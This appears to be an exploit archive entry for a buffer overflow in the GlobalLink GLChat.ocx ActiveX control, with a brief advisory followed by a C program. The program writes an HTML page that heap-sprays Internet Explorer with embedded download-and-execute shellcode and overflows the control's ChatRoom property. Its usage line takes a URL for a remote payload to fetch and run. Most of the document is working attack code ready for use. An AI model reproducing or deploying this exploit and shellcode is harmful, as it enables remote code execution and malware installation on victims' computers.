GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Remote Buffer Overflow

source: https://www.securityfocus.com/bid/27393/info

GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.

GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable. 

//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964  
#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] = 
{
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A, 
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F, 
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1, 
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C, 
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41, 
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03, 
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B, 
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC, 
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB, 
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00, 
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};

const char* script1 = \
"<html><body><object id=\"sb\" classid=\"clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69\"></object><script>"
"var shellcode = unescape(\"";
const char* script2 = \
"\");"
"bigblock = unescape(\"%u9090\");"
"headersize = 20;"
"slackspace = headersize + shellcode.length;"
"while ( bigblock.length < slackspace ) bigblock += bigblock;"
"fillblock = bigblock.substring(0, slackspace);"
"block = bigblock.substring(0, bigblock.length - slackspace);"
"while(block.length + slackspace < 0x40000) block = block + block + fillblock;"
"memory = new Array();"
"for (x=0; x< 300; x++) memory[x] = block + shellcode;"
"var zhen = '\\x0a';"
"while (zhen.length < 4057) zhen += '\\x0a\\x0a\\x0a\\x0a';"
"sb.ChatRoom = zhen;"
"</script>"
"</body>"
"</html>";

int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
return -1;
}

FILE *file = fopen("knell.html", "w+");
if ( file == NULL )
{
printf("create 'knell.html' failed!\n");
return -2;
}

fprintf(file, "%s", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);

const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);

fprintf(file, "%s", script2);
fclose(file);

printf("make 'knell.html' successed!\n");

return 0;
}